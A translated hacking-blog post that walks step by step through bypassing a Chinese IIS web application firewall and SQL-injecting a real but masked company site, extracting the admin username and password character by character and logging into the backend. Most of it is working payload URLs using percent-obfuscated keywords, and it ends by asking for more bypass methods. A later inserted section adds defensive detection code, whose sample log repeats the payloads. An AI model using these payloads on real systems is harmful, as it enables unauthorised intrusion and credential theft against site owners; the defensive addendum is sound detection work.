Today's technique combines ideas from the web with my own thinking to bypass the "龙盾IIS防火墙" (a Chinese IIS web application firewall); I haven't tried it against other firewalls.

OK, enough chatter, on to the hands-on part.

Manual injection only; tools won't get anywhere here.

First, check whether there is an injection point:

http://***.com/newsShow.asp?ArticleID=120 '

http://***.com/newsShow.asp?ArticleID=120 and 1=1

http://***.com/newsShow.asp?ArticleID=120 and 1=2

Every time it responds with: "龙盾IIS防火墙" notice: please do not submit illegal data or access maliciously.

I guess everyone is familiar with this one; quite a few sites in China use this firewall now, and there is not much material about it online, heh.

Did some research on my own

and got through~

http://***.com/newsShow.asp?ArticleID=(120)%20and%20(%201=1%20) returns normally

http://***.com/newsShow.asp?ArticleID=(120)%20and%20(%201=2%20) returns an error

Heh, looks like the firewall's restriction has been bypassed~ haha~

On with the guessing~

http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct * from admin)

Heh, returns fine, so the admin table exists. It should be an Access database; it is a company site, so Access is a safe bet, heh.

http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct username from admin)

Heh, returns fine: the username column exists.

http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct password from admin)

Heh, returns fine: the password column exists.

Keep guessing our way down~ let's go,

http://***.com/newsShow.asp?ArticleID=(120) order by 1

http://***.com/newsShow.asp?ArticleID=(120) order by 1 order by 1

Both keep returning errors, so it looks like order by can't be used. No choice but to guess character by character~

First let's see how many characters the admin username has~

http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists(sele%%%ct username from admin where len(username)=5)

Returns normally, heh, not bad, lucky guess~

http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(username,1))=120)

http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(username,2))=50)

http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(username,3))=99)

http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(username,4))=51)

http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(username,5))=109)

That's the whole username; converted the ASCII codes with a calculator.

Username: x2c3m

Next, guess the password~~

http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists(sele%%%ct password from admin where len(password)=8) the password is 8 characters long

http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(password,1))=98)

http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(password,2))=105)

http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(password,3))=111)

http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(password,4))=115)

http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(password,5))=108)

http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(password,6))=111)

http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(password,7))=97)

http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(password,8))=100)

Password: b***ad

Went straight to the admin backend and logged in, done; getting a shell from there is simple so I won't cover it~~
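Defender's side of the same walkthrough, added here as an example and not part of the original post. The two things the write-up depends on are (1) the firewall and the ASP backend reading the query string differently, so `ex%%%ists` looks harmless to the filter but is executed as `exists`, and (2) one request per character of the admin username and password. The Python below models both: it normalizes the query string the way a lenient backend decoder would (that such a decoder drops a stray `%` is an assumption made for this demo), matches tolerant signatures on the normalized text instead of the raw bytes, and flags a client that walks `asc(mid(column, n))` across several positions. The log format, client addresses and signature list are constructed for the example.

```python
"""Added example (not from the original post): detect, from the defender's
side, the two techniques the walkthrough relies on.

1. Decoder mismatch: a filter that matches signatures on the request as sent
   misses 'ex%%%ists' if the backend decoder silently drops stray '%' and runs
   'exists'. Normalize the request the way the backend will read it, then match.
   (The stray-'%' stripping is an assumed backend behaviour used for the demo.)
2. Boolean-blind enumeration: one request per character, 'asc(mid(col, n))=k',
   shows up as one client walking n upward against the same column.

All log lines, addresses and signatures below are constructed for the demo.
"""
import re
from collections import defaultdict
from urllib.parse import unquote

# Tolerant signatures: whitespace and parentheses between tokens are allowed,
# so 'and ( 1=1 )' is caught the same way as 'and 1=1'.
SQLI_SIGNATURE = re.compile(
    r"\b(?:exists|select|union|insert|update|delete|drop)\b"
    r"|\band\s*\(*\s*1\s*=\s*[12]\b",
    re.IGNORECASE,
)
# One character probe of a boolean-blind attack: asc(mid(column, position))
PROBE = re.compile(r"asc\s*\(\s*mid\s*\(\s*(\w+)\s*,\s*(\d+)", re.IGNORECASE)


def strict_decode(query: str) -> str:
    """What a filter sees if it decodes only well-formed %XX escapes."""
    return unquote(query.replace("+", " "))


def lenient_decode(query: str) -> str:
    """Model of a backend decoder that decodes %XX and silently drops any '%'
    not followed by two hex digits (assumed behaviour): 'ex%%%ists' -> 'exists'."""
    out, i = [], 0
    while i < len(query):
        ch = query[i]
        if ch == "%" and re.fullmatch(r"[0-9A-Fa-f]{2}", query[i + 1:i + 3]):
            out.append(chr(int(query[i + 1:i + 3], 16)))
            i += 3
        elif ch == "%":
            i += 1  # stray '%': dropped, nothing emitted
        else:
            out.append(" " if ch == "+" else ch)
            i += 1
    return "".join(out)


def classify(url: str) -> dict:
    """Classify one request URL from the filter's and the backend's point of view."""
    query = url.partition("?")[2]
    filter_view = strict_decode(query)
    backend_view = lenient_decode(query)
    filter_hit = bool(SQLI_SIGNATURE.search(filter_view))
    backend_hit = bool(SQLI_SIGNATURE.search(backend_view))
    probe = PROBE.search(backend_view)
    return {
        "filter_hit": filter_hit,
        "backend_hit": backend_hit,
        "evasion": backend_hit and not filter_hit,  # decoder mismatch abused
        "probe": (probe.group(1).lower(), int(probe.group(2))) if probe else None,
    }


def analyze_log(lines, min_positions: int = 3):
    """Scan 'client url' log lines; return alerts for evasion attempts and for
    clients walking one column character by character."""
    alerts = []
    positions = defaultdict(set)  # (client, column) -> probed positions
    for line in lines:
        client, _, url = line.strip().partition(" ")
        c = classify(url)
        if c["evasion"]:
            alerts.append(("decoder-mismatch-evasion", client, url))
        if c["probe"]:
            positions[(client, c["probe"][0])].add(c["probe"][1])
    for (client, column), seen in positions.items():
        if len(seen) >= min_positions:
            alerts.append(("blind-enumeration", client,
                           f"{column}: positions {sorted(seen)}"))
    return alerts


# Constructed access-log excerpt: the probes from the walkthrough plus one
# ordinary visitor. Addresses are documentation ranges, not real clients.
SAMPLE_LOG = [
    "198.51.100.7 http://***.com/newsShow.asp?ArticleID=120",
    "198.51.100.7 http://***.com/newsShow.asp?ArticleID=120%20and%201=1",
    "198.51.100.7 http://***.com/newsShow.asp?ArticleID=(120)%20and%20(%201=1%20)",
    "198.51.100.7 http://***.com/newsShow.asp?ArticleID=(120)%20and%20ex%%%ists%20(sele%%%ct%20*%20from%20admin)",
    "198.51.100.7 http://***.com/newsShow.asp?ArticleID=(120)%20and%20ex%%%ists%20(sele%%%ct%20id%20from%20admin%20where%20asc(mid(username,1))=120)",
    "198.51.100.7 http://***.com/newsShow.asp?ArticleID=(120)%20and%20ex%%%ists%20(sele%%%ct%20id%20from%20admin%20where%20asc(mid(username,2))=50)",
    "198.51.100.7 http://***.com/newsShow.asp?ArticleID=(120)%20and%20ex%%%ists%20(sele%%%ct%20id%20from%20admin%20where%20asc(mid(username,3))=99)",
    "203.0.113.9 http://***.com/newsShow.asp?ArticleID=121",
]

if __name__ == "__main__":
    for alert in analyze_log(SAMPLE_LOG):
        print(*alert)
```

The design point is to match on the backend's view of the request rather than on the bytes on the wire: in the sample log the `and 1=1` probe is caught in both views, while the `ex%%%ists` requests are caught only after normalization, and the three `asc(mid(username, n))` requests from one client trip the enumeration rule. Detection is a backstop, not the fix: `ArticleID` here is numeric, so validating it as an integer or passing it as a query parameter instead of concatenating it into SQL removes the injection point regardless of what the firewall sees.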

There are more and more firewalls these days; I hope to exchange firewall bypass techniques with everyone, so if any experts have good methods please leave a comment….

Please credit reposts: reposted from 小马's Blog https://www.i0day.com

Link to this post: https://www.i0day.com/230.html